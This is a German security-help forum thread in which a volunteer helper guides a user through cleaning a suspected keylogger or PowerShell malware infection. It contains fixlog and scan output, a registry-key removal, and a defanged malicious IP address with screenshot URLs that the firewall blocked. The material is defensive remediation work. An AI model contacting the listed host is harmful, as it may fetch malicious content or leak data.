HKEY_CURRENT_USER\Software\DeepL
HKEY_CURRENT_USER\Software\Dropbox
HKEY_CURRENT_USER\Software\DropboxUpdate
HKEY_CURRENT_USER\Software\DuoDianApp
HKEY_CURRENT_USER\Software\DYMO
HKEY_CURRENT_USER\Software\ecce-terram.de
HKEY_CURRENT_USER\Software\Edge
HKEY_CURRENT_USER\Software\ej-technologies
HKEY_CURRENT_USER\Software\ENE_RGB_HAL_A0
HKEY_CURRENT_USER\Software\ENE_RGB_HAL_EHD
HKEY_CURRENT_USER\Software\ENE_RGB_HAL_SSS
HKEY_CURRENT_USER\Software\Epic Games
HKEY_CURRENT_USER\Software\EPSON
HKEY_CURRENT_USER\Software\F-Secure
HKEY_CURRENT_USER\Software\Fortinet
HKEY_CURRENT_USER\Software\Fritzing
HKEY_CURRENT_USER\Software\Ghisler
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\Governikus GmbH & Co. KG
HKEY_CURRENT_USER\Software\Hewlett-Packard
HKEY_CURRENT_USER\Software\HmelyoffLabs
HKEY_CURRENT_USER\Software\Icaros
HKEY_CURRENT_USER\Software\IM Providers
HKEY_CURRENT_USER\Software\Image-Line
HKEY_CURRENT_USER\Software\Intel
HKEY_CURRENT_USER\Software\IPSView
HKEY_CURRENT_USER\Software\iSpring Solutions
HKEY_CURRENT_USER\Software\Jabra
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Khronos
HKEY_CURRENT_USER\Software\Kodak
HKEY_CURRENT_USER\Software\Lenovo
HKEY_CURRENT_USER\Software\LG Soft India
HKEY_CURRENT_USER\Software\LinuxLive
HKEY_CURRENT_USER\Software\LogiShrd
HKEY_CURRENT_USER\Software\Logitech
HKEY_CURRENT_USER\Software\Magnet
HKEY_CURRENT_USER\Software\Malwarebytes
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_CURRENT_USER\Software\MAY Computer
HKEY_CURRENT_USER\Software\MediaChance
HKEY_CURRENT_USER\Software\Meltytech
HKEY_CURRENT_USER\Software\Micah Lee
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\MiniTool Software Limited
HKEY_CURRENT_USER\Software\MJTNET
HKEY_CURRENT_USER\Software\Mozilla
HKEY_CURRENT_USER\Software\mRemoteNG
HKEY_CURRENT_USER\Software\MTK
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\No Bull Software
HKEY_CURRENT_USER\Software\nwjs
HKEY_CURRENT_USER\Software\OCS
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Opera Software
HKEY_CURRENT_USER\Software\orwonet.de
HKEY_CURRENT_USER\Software\Paragon Software
HKEY_CURRENT_USER\Software\PDF Labs
HKEY_CURRENT_USER\Software\Piriform
HKEY_CURRENT_USER\Software\PITTA
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\QtProject
HKEY_CURRENT_USER\Software\Raspberry Pi
HKEY_CURRENT_USER\Software\Realtek
HKEY_CURRENT_USER\Software\RegisteredApplications
HKEY_CURRENT_USER\Software\REINER SCT
HKEY_CURRENT_USER\Software\repairit
HKEY_CURRENT_USER\Software\rmonline
HKEY_CURRENT_USER\Software\Samsung
HKEY_CURRENT_USER\Software\SimonTatham
HKEY_CURRENT_USER\Software\SketchUp
HKEY_CURRENT_USER\Software\SoftPerfect
HKEY_CURRENT_USER\Software\SoftVoice
HKEY_CURRENT_USER\Software\Spoon
HKEY_CURRENT_USER\Software\Start14
HKEY_CURRENT_USER\Software\SubSystems
HKEY_CURRENT_USER\Software\Synology
HKEY_CURRENT_USER\Software\TeamViewer
HKEY_CURRENT_USER\Software\TechSmith
HKEY_CURRENT_USER\Software\TelegramDesktop
HKEY_CURRENT_USER\Software\Tor Project
HKEY_CURRENT_USER\Software\Trolltech
HKEY_CURRENT_USER\Software\UltiMaker
HKEY_CURRENT_USER\Software\Ultimaker B.V.
HKEY_CURRENT_USER\Software\VB and VBA Program Settings
HKEY_CURRENT_USER\Software\VMware, Inc.
HKEY_CURRENT_USER\Software\WinMTR
HKEY_CURRENT_USER\Software\WinNUT
HKEY_CURRENT_USER\Software\WinRAR SFX
HKEY_CURRENT_USER\Software\Wireshark
HKEY_CURRENT_USER\Software\WOI
HKEY_CURRENT_USER\Software\Wondershare
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\WPCubed
HKEY_CURRENT_USER\Software\WST
HKEY_CURRENT_USER\Software\XSplit
HKEY_CURRENT_USER\Software\Zero Install
HKEY_CURRENT_USER\Software\Classes


========= Ende von CMD: =========


========= reg query "HKLM\Software" /reg:32 =========


HKEY_LOCAL_MACHINE\Software\ABBYY
HKEY_LOCAL_MACHINE\Software\Acronis
HKEY_LOCAL_MACHINE\Software\Adobe
HKEY_LOCAL_MACHINE\Software\Advanced Card Systems Ltd.
HKEY_LOCAL_MACHINE\Software\Apple Inc.
HKEY_LOCAL_MACHINE\Software\Ashampoo
HKEY_LOCAL_MACHINE\Software\ASIO
HKEY_LOCAL_MACHINE\Software\ASIO4ALL
HKEY_LOCAL_MACHINE\Software\ASPOA GmbH
HKEY_LOCAL_MACHINE\Software\Avast Software
HKEY_LOCAL_MACHINE\Software\AVM
HKEY_LOCAL_MACHINE\Software\Benjamin Bentmann
HKEY_LOCAL_MACHINE\Software\Bitdefender Agent
HKEY_LOCAL_MACHINE\Software\Blackmagic Design
HKEY_LOCAL_MACHINE\Software\Brother Industries, Ltd.
HKEY_LOCAL_MACHINE\Software\Brownson
HKEY_LOCAL_MACHINE\Software\Buhl Data Service GmbH
HKEY_LOCAL_MACHINE\Software\Business Objects
HKEY_LOCAL_MACHINE\Software\Canon
HKEY_LOCAL_MACHINE\Software\Canon Electronics Inc.
HKEY_LOCAL_MACHINE\Software\Caphyon
HKEY_LOCAL_MACHINE\Software\Citrix
HKEY_LOCAL_MACHINE\Software\Creality3D
HKEY_LOCAL_MACHINE\Software\Cygnus Solutions
HKEY_LOCAL_MACHINE\Software\Cygwin
HKEY_LOCAL_MACHINE\Software\devolo
HKEY_LOCAL_MACHINE\Software\Dialogys
HKEY_LOCAL_MACHINE\Software\dotnet
HKEY_LOCAL_MACHINE\Software\DroidCam
HKEY_LOCAL_MACHINE\Software\Dropbox
HKEY_LOCAL_MACHINE\Software\DropboxUpdate
HKEY_LOCAL_MACHINE\Software\DuoDianOnline
HKEY_LOCAL_MACHINE\Software\ej-technologies
HKEY_LOCAL_MACHINE\Software\Epic Games
HKEY_LOCAL_MACHINE\Software\EpicGames
HKEY_LOCAL_MACHINE\Software\EPSON
HKEY_LOCAL_MACHINE\Software\F-Secure
HKEY_LOCAL_MACHINE\Software\Ghisler
HKEY_LOCAL_MACHINE\Software\Google
HKEY_LOCAL_MACHINE\Software\Hewlett-Packard
HKEY_LOCAL_MACHINE\Software\HiBase Group
HKEY_LOCAL_MACHINE\Software\Icaros
HKEY_LOCAL_MACHINE\Software\Image-Line
HKEY_LOCAL_MACHINE\Software\Intel
HKEY_LOCAL_MACHINE\Software\iSpring Solutions
HKEY_LOCAL_MACHINE\Software\Jabra
HKEY_LOCAL_MACHINE\Software\JavaSoft
HKEY_LOCAL_MACHINE\Software\JreMetrics
HKEY_LOCAL_MACHINE\Software\Khronos
HKEY_LOCAL_MACHINE\Software\Lenovo
HKEY_LOCAL_MACHINE\Software\LG Electronics Inc
HKEY_LOCAL_MACHINE\Software\LGDDCIStack
HKEY_LOCAL_MACHINE\Software\Malwarebytes
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\MAXSOFT-OCRON
HKEY_LOCAL_MACHINE\Software\Microsoft
HKEY_LOCAL_MACHINE\Software\Mozilla
HKEY_LOCAL_MACHINE\Software\MozillaPlugins
HKEY_LOCAL_MACHINE\Software\mRemoteNG
HKEY_LOCAL_MACHINE\Software\Nikon
HKEY_LOCAL_MACHINE\Software\Nikon Corporation
HKEY_LOCAL_MACHINE\Software\Notepad++
HKEY_LOCAL_MACHINE\Software\OBS Studio
HKEY_LOCAL_MACHINE\Software\ODBC
HKEY_LOCAL_MACHINE\Software\Pixel Translations
HKEY_LOCAL_MACHINE\Software\PowerPivot
HKEY_LOCAL_MACHINE\Software\Propellerhead Software
HKEY_LOCAL_MACHINE\Software\Realtek
HKEY_LOCAL_MACHINE\Software\Realtek Semiconductor Corp.
HKEY_LOCAL_MACHINE\Software\repairit
HKEY_LOCAL_MACHINE\Software\Samsung
HKEY_LOCAL_MACHINE\Software\SANEWinDS
HKEY_LOCAL_MACHINE\Software\SoftVoice
HKEY_LOCAL_MACHINE\Software\StarFinanz
HKEY_LOCAL_MACHINE\Software\TeamViewer
HKEY_LOCAL_MACHINE\Software\TechSmith
HKEY_LOCAL_MACHINE\Software\ThinPrint
HKEY_LOCAL_MACHINE\Software\Trolltech
HKEY_LOCAL_MACHINE\Software\TVInstallTemp
HKEY_LOCAL_MACHINE\Software\VMware, Inc.
HKEY_LOCAL_MACHINE\Software\Volatile
HKEY_LOCAL_MACHINE\Software\WafCX
HKEY_LOCAL_MACHINE\Software\Winbond Auto-Copy
HKEY_LOCAL_MACHINE\Software\Wondershare
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_LOCAL_MACHINE\Software\XSplit
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\Clients
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\Software\RegisteredApplications


========= Ende von CMD: =========


========= reg query "HKLM\Software" /reg:64 =========


HKEY_LOCAL_MACHINE\Software
    (Standard)    REG_SZ    

HKEY_LOCAL_MACHINE\Software\14607473-30db-509f-94f0-bb7c085c619e
HKEY_LOCAL_MACHINE\Software\1D0EC6DE-4A80-4CC3-A335-E6E41C951198
HKEY_LOCAL_MACHINE\Software\64954139-9cf6-59bf-952e-0637eb939033
HKEY_LOCAL_MACHINE\Software\7-Zip
HKEY_LOCAL_MACHINE\Software\ABBYY
HKEY_LOCAL_MACHINE\Software\Acronis
HKEY_LOCAL_MACHINE\Software\Adobe
HKEY_LOCAL_MACHINE\Software\Advanced Card Systems Ltd.
HKEY_LOCAL_MACHINE\Software\AE Protection
HKEY_LOCAL_MACHINE\Software\Apple Inc.
HKEY_LOCAL_MACHINE\Software\Ashampoo
HKEY_LOCAL_MACHINE\Software\ASIO
HKEY_LOCAL_MACHINE\Software\Avast Software
HKEY_LOCAL_MACHINE\Software\Azureus
HKEY_LOCAL_MACHINE\Software\Bambulab
HKEY_LOCAL_MACHINE\Software\Blackmagic Design
HKEY_LOCAL_MACHINE\Software\Brother Industries, Ltd.
HKEY_LOCAL_MACHINE\Software\Canon
HKEY_LOCAL_MACHINE\Software\Caphyon
HKEY_LOCAL_MACHINE\Software\Chromium
HKEY_LOCAL_MACHINE\Software\cl2021.upgrade
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\Clients
HKEY_LOCAL_MACHINE\Software\CVSM
HKEY_LOCAL_MACHINE\Software\DefaultUserEnvironment
HKEY_LOCAL_MACHINE\Software\dotnet
HKEY_LOCAL_MACHINE\Software\DownloadHelper
HKEY_LOCAL_MACHINE\Software\DYMO
HKEY_LOCAL_MACHINE\Software\ej-technologies
HKEY_LOCAL_MACHINE\Software\F-Secure
HKEY_LOCAL_MACHINE\Software\Fortinet
HKEY_LOCAL_MACHINE\Software\Ghisler
HKEY_LOCAL_MACHINE\Software\GIMP 2.10
HKEY_LOCAL_MACHINE\Software\Google
HKEY_LOCAL_MACHINE\Software\Governikus GmbH & Co. KG
HKEY_LOCAL_MACHINE\Software\Hewlett-Packard
HKEY_LOCAL_MACHINE\Software\HiJackThis+
HKEY_LOCAL_MACHINE\Software\HP
HKEY_LOCAL_MACHINE\Software\Icaros
HKEY_LOCAL_MACHINE\Software\IM Providers
HKEY_LOCAL_MACHINE\Software\Image-Line
HKEY_LOCAL_MACHINE\Software\Intel
HKEY_LOCAL_MACHINE\Software\IrfanView
HKEY_LOCAL_MACHINE\Software\iSpring Solutions
HKEY_LOCAL_MACHINE\Software\JavaSoft
HKEY_LOCAL_MACHINE\Software\JreMetrics
HKEY_LOCAL_MACHINE\Software\Khronos
HKEY_LOCAL_MACHINE\Software\Lenovo
HKEY_LOCAL_MACHINE\Software\Logishrd
HKEY_LOCAL_MACHINE\Software\Logitech
HKEY_LOCAL_MACHINE\Software\Malwarebytes
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Maxon
HKEY_LOCAL_MACHINE\Software\Microsoft
HKEY_LOCAL_MACHINE\Software\MiniTool Software Limited
HKEY_LOCAL_MACHINE\Software\Minnetonka Audio Software
HKEY_LOCAL_MACHINE\Software\Mozilla
HKEY_LOCAL_MACHINE\Software\mozilla.org
HKEY_LOCAL_MACHINE\Software\MozillaPlugins
HKEY_LOCAL_MACHINE\Software\Nikon
HKEY_LOCAL_MACHINE\Software\Notepad++
HKEY_LOCAL_MACHINE\Software\OBS Studio
HKEY_LOCAL_MACHINE\Software\ODBC
HKEY_LOCAL_MACHINE\Software\OEM
HKEY_LOCAL_MACHINE\Software\Open Media LLC
HKEY_LOCAL_MACHINE\Software\OpenSSH
HKEY_LOCAL_MACHINE\Software\Oracle
HKEY_LOCAL_MACHINE\Software\Partner
HKEY_LOCAL_MACHINE\Software\Piriform
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\Software\Propellerhead Software
HKEY_LOCAL_MACHINE\Software\Realtek
HKEY_LOCAL_MACHINE\Software\RegisteredApplications
HKEY_LOCAL_MACHINE\Software\REINER SCT
HKEY_LOCAL_MACHINE\Software\repairit
HKEY_LOCAL_MACHINE\Software\SAMSUNG
HKEY_LOCAL_MACHINE\Software\Setup
HKEY_LOCAL_MACHINE\Software\Shotcut
HKEY_LOCAL_MACHINE\Software\SimonTatham
HKEY_LOCAL_MACHINE\Software\SketchUp
HKEY_LOCAL_MACHINE\Software\SoftVoice
HKEY_LOCAL_MACHINE\Software\SyncIntegrationClients
HKEY_LOCAL_MACHINE\Software\Synology
HKEY_LOCAL_MACHINE\Software\TechSmith
HKEY_LOCAL_MACHINE\Software\VideoLAN
HKEY_LOCAL_MACHINE\Software\VMware, Inc.
HKEY_LOCAL_MACHINE\Software\WinChipHead
HKEY_LOCAL_MACHINE\Software\Windows
HKEY_LOCAL_MACHINE\Software\Wondershare
HKEY_LOCAL_MACHINE\Software\WOW6432Node
HKEY_LOCAL_MACHINE\Software\XSplit


========= Ende von CMD: =========


========= dir /A "c:\users\public" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: 2448-20ZA

 Verzeichnis von c:\users\public

04.11.2022  06:13    <DIR>          .
04.11.2022  06:15    <DIR>          ..
04.11.2022  06:31    <DIR>          AccountPictures
25.03.2024  04:42    <DIR>          Desktop
07.05.2022  06:22               174 desktop.ini
25.03.2024  14:35    <DIR>          Documents
07.12.2019  10:14    <DIR>          Downloads
04.11.2022  06:13    <DIR>          Libraries
07.12.2019  10:14    <DIR>          Music
07.12.2019  10:14    <DIR>          Pictures
04.02.2021  20:54    <DIR>          TechSmith
07.12.2019  10:14    <DIR>          Videos
               1 Datei(en),            174 Bytes
              11 Verzeichnis(se), 76.498.939.904 Bytes frei


========= Ende von CMD: =========


========= dir /A "C:\Users\user.domäne" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: 2448-20ZA

 Verzeichnis von C:\Users\user.domäne

25.03.2024  01:57    <DIR>          .
04.11.2022  06:15    <DIR>          ..
11.03.2023  09:04    <DIR>          .android
11.03.2023  09:03    <DIR>          .BigNox
05.08.2022  12:32    <DIR>          .cache
07.07.2023  09:05    <DIR>          .dotnet
26.10.2022  17:15    <DIR>          .dropbox_bi
22.02.2023  15:04    <DIR>          .freemind
26.04.2023  22:49    <DIR>          .junique
30.06.2022  16:30    <DIR>          .ms-ad
16.01.2024  19:56    <DIR>          .openshot_qt
02.02.2022  16:50    <DIR>          .platformio
19.05.2022  15:44    <DIR>          .ssh
12.03.2021  18:33    <DIR>          .swt
12.07.2023  19:53    <DIR>          .thumbnails
02.02.2022  16:11    <DIR>          .vscode
12.02.2022  09:45    <DIR>          3D Objects
04.11.2022  06:15    <JUNCTION>     Anwendungsdaten [C:\Users\user.domäne\AppData\Roaming]
04.11.2022  06:27    <DIR>          AppData
17.02.2024  21:24    <DIR>          Bluetooth
04.11.2022  06:31    <DIR>          Contacts
04.11.2022  06:15    <JUNCTION>     Cookies [C:\Users\user.domäne\AppData\Local\Microsoft\Windows\INetCookies]
11.03.2023  09:04               297 d4ac4633ebd6440fa397b84f1bc94a3c.7z
24.03.2024  23:05    <DIR>          Desktop
14.02.2022  14:08    <DIR>          diylc
03.02.2021  12:32    <DIR>          Documents
16.01.2024  19:55    <DIR>          Downloads
04.11.2022  06:15    <JUNCTION>     Druckumgebung [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
27.06.2021  22:45    <DIR>          dwhelper
04.11.2022  06:15    <JUNCTION>     Eigene Dateien [C:\Users\user.domäne\Documents]
25.05.2022  16:23    <DIR>          eTeks
04.11.2022  06:31    <DIR>          Favorites
14.07.2022  13:22                66 inittk.ini
14.07.2022  13:22                41 inst.ini
04.11.2022  06:40    <DIR>          Links
09.01.2022  19:44    <DIR>          Local Settings
04.11.2022  06:15    <JUNCTION>     Lokale Einstellungen [C:\Users\user.domäne\AppData\Local]
04.11.2022  06:15    <JUNCTION>     Netzwerkumgebung [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
14.07.2022  13:22    <DIR>          Nox_share
25.03.2024  06:01        14.417.920 NTUSER.DAT
04.11.2022  06:15         3.145.728 ntuser.dat.LOG1
04.11.2022  06:15         3.613.696 ntuser.dat.LOG2
04.11.2022  06:15            65.536 NTUSER.DAT{85a19e94-5bff-11ed-9565-005056c00008}.TM.blf
04.11.2022  06:15           524.288 NTUSER.DAT{85a19e94-5bff-11ed-9565-005056c00008}.TMContainer00000000000000000001.regtrans-ms
04.11.2022  06:15           524.288 NTUSER.DAT{85a19e94-5bff-11ed-9565-005056c00008}.TMContainer00000000000000000002.regtrans-ms
04.11.2022  06:30                20 ntuser.ini
14.07.2022  13:22                45 nuuid.ini
02.02.2021  16:34    <DIR>          OneDrive
04.11.2022  06:15    <JUNCTION>     Recent [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Recent]
02.08.2022  14:21               485 sanetwain.ini
04.11.2022  06:40    <DIR>          Saved Games
04.11.2022  06:31    <DIR>          Searches
04.11.2022  06:15    <JUNCTION>     SendTo [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\SendTo]
01.01.2024  02:02    <DIR>          Shutter Encoder
04.11.2022  06:15    <JUNCTION>     Startmenü [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu]
06.02.2021  11:08                 0 Sti_Trace.log
24.03.2024  21:57    <DIR>          temp
02.01.2023  12:48    <DIR>          usb_driver
14.07.2022  13:22                53 useruid.ini
11.03.2023  09:03    <DIR>          vmlogs
04.11.2022  06:15    <JUNCTION>     Vorlagen [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates]
              14 Datei(en),     22.292.463 Bytes
              47 Verzeichnis(se), 76.498.915.328 Bytes frei


========= Ende von CMD: =========


========= cscript /nologo %systemroot%\System32\slmgr.vbs /dlv =========

Softwarelizenzierungsdienst-Version: 10.0.22621.3296

Name: Windows(R), Professional edition
Beschreibung: Windows(R) Operating System, VOLUME_MAK channel
Aktivierungs-ID: 39cd895b-53b2-4dc4-a5f7-b18aa019ad33
Anwendungs-ID: 35c92734-d682-4d71-983e-d6ec3f160593
Erweiterte PID: 33612-03312-009-000000-03-1031-22621.0000-3082023
Product Key-Kanal: Volume:MAK
Installations-ID: 336413596693231515860949518456516963754392973443279943039248803
Lizenz-URL verwenden: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
URL fr die šberprfung: https://validation-v2.sls.microsoft.com/SLWGA/slwga.asmx
Teil-Product Key: AD49M
Lizenzstatus: Lizenziert
Verbleibende Windows Rearm-Anzahl: 1001
Verbleibende SKU Rearm-Anzahl: 1001
Vertrauenswrdige Zeit: 25.03.2024 15:47:58




========= Ende von CMD: =========


========= netsh winsock reset =========


Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.



========= Ende von CMD: =========


========= netsh advfirewall reset =========

OK.



========= Ende von CMD: =========


========= netsh advfirewall set allprofiles state ON =========

OK.



========= Ende von CMD: =========


========= netsh winhttp reset proxy =========


Aktuelle WinHTTP-Proxyeinstellungen:

    DirectAccess (kein Proxyserver).



========= Ende von CMD: =========


========= Bitsadmin /Reset /Allusers =========


BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

0 out of 0 jobs canceled.


========= Ende von CMD: =========


========= Winmgmt /salvagerepository =========

Das WMI-Repository ist konsistent.


========= Ende von CMD: =========


========= Winmgmt /verifyrepository =========

Das WMI-Repository ist konsistent.


========= Ende von CMD: =========


========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========


========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========


========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========


========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========

C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-3460856420-2582145234-728948223-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-3460856420-2582145234-728948223-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt


========= Ende von RemoveProxy: =========


=========== EmptyTemp: ==========

FlushDNS => abgeschlossen
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36625154 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 4600 B
Windows/system/drivers => 15691358 B
Edge => 0 B
Chrome => 990911811 B
Firefox => 18724273 B
Opera => 13633904 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Thomas => 23186 B
user.domäne => 77675088 B
DefaultAppPool => 77675088 B

RecycleBin => 0 B
EmptyTemp: => 1.1 GB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 15:48:27 ====
         
Nachtrag:

In der Nacht ist mir noch aufgefallen, dass die Firewall fast 20.000 versuche blockiert hat. Immer zur gleichen URL:

hxxp://5.189.183.113/Screenshot2024-03-25151555.png

hxxp://5.189.183.113/Screenshot2024-03-25151655.png

Geändert von dslthomas (25.03.2024 um 16:52 Uhr)

Alt 25.03.2024, 17:51   #5
M-K-D-B
/// TB-Ausbilder
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Vielen Dank für die Logdatei und den Nachtrag.
Du hast ja einiges schon selbst entfernt gehabt.

Meldet die Firewall nun (nach dem Fix) immer noch das Blockieren von Seiten?



Bitte lösche diesen Schlüssel (der scheint auch von der Malware zu stammen):
HKEY_CURRENT_USER\Software\B0A95C82BA6D3B5A9F4A




Ich würde nun zwei Kontrollen mit MBAM und ESET vorschlagen.



Schritt 1
Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.



Schritt 2
Führe ESET Online Scanner (EOS) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.


Alt 26.03.2024, 05:53   #6
dslthomas
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Moin, Moin,

so,- fertig.... Eset hat sehr lange gedauert, aber beide Scans sind jetzt fertig.

Hier das Log von MB:

Code:
ATTFilter
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 26.03.2024
Scan-Zeit: 05:27
Protokolldatei: 2a906ddc-eb29-11ee-ae97-00090faa0001.json

-Softwaredaten-
Version: 5.1.0.102
Komponentenversion: 1.0.1179
Version des Aktualisierungspakets: 1.0.82622
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 11 (Build 22621.3296)
CPU: x64
Dateisystem: NTFS
Benutzer: DT\thomas

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 391334
Erkannte Bedrohungen: 2
In die Quarantäne verschobene Bedrohungen: 0
Abgelaufene Zeit: 13 Min., 34 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswert: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Datei: 2
PUP.Optional.StartFenster, C:\USERS\user.domäne\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Keine Aktion durch Benutzer, 5139, 455286, 1.0.82622, , ame, , 99FEDE3F119241087B7A7B2525847AEC, 4170368185AB13F7EAD54F15C12C9D98A0606B13F502CC2E3491DF3245DD5478
PUP.Optional.StartFenster, C:\USERS\user.domäne\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Keine Aktion durch Benutzer, 5139, 455286, 1.0.82622, , ame, , 99FEDE3F119241087B7A7B2525847AEC, 4170368185AB13F7EAD54F15C12C9D98A0606B13F502CC2E3491DF3245DD5478

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

WMI: 0
(keine bösartigen Elemente erkannt)


(end)
         
und hier das Log von Eset:

Code:
ATTFilter
26.03.2024 05:11:29
Geprüfte Dateien: 2249061
Erkannte Dateien: 1
Gesäuberte Dateien: 1
Scandauer gesamt 02:20:33
Scanstatus: Abgeschlossen
D:\Documents\Server\04.03.2013\xyz.de\cgi-bin\.2918.php.böse	PHP/Small.NAQ trojan	cleaned by deleting
         
(URL´s und Domänen habe ich geändert) Die Datei von von Eset halte ich zwar für false Positiv. Da es aber eine Sehr alte Sicherung ist, habe ich die Datei trotz dem löschen lassen.

In der Firewall sind keine ungewöhnlichen Ereignisse mehr verzeichnet.

Ich glaube, es war eine gute Idee,- sofort die c:\Windows\System32\WindowsPowerShelll\v1.0\powershell.exe umzubenennen. Es waren locker 10 Prozesse der Powershell im Taskmanager zu sehen. Die hatte ich gekillt und es entstanden eigentlich schnell wieder neue Prozesse. Daher hatte ich die Powershell.exe umbenannt und damit konnte ich mit allen Möglichen Tools den Rechner überhaupt erst einmal scannen und untersuchen. Es scheint aber jetzt wirklich alles weg zu sein.

Ich verbäuge mich zutiefst und Bedanke mich für die Unterstützung!!!!

Alt 26.03.2024, 09:29   #7
M-K-D-B
/// TB-Ausbilder
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Vielen Dank für die Rückmeldung.

Die Funde von MBAM hast du auch entfernen lassen, oder?
In der Logdatei steht nämlich "Keine Aktion durch Benutzer".

Zum Abschluss würde ich gerne eine Kontrolle mit FRST und SecurityCheck ausführen.
Ich hoffe, das ist ok für dich.



Schritt 1
  • Starte FRST erneut und klicke auf Untersuchen.
  • FRST erstellt nun zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.




Schritt 2
Führe SecurityCheck (SC) gemäß der bebilderten Anleitung aus und füge die Logdatei als Anhang hinzu.

Alt 26.03.2024, 11:07   #8
dslthomas
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Zitat:
Zitat von M-K-D-B Beitrag anzeigen
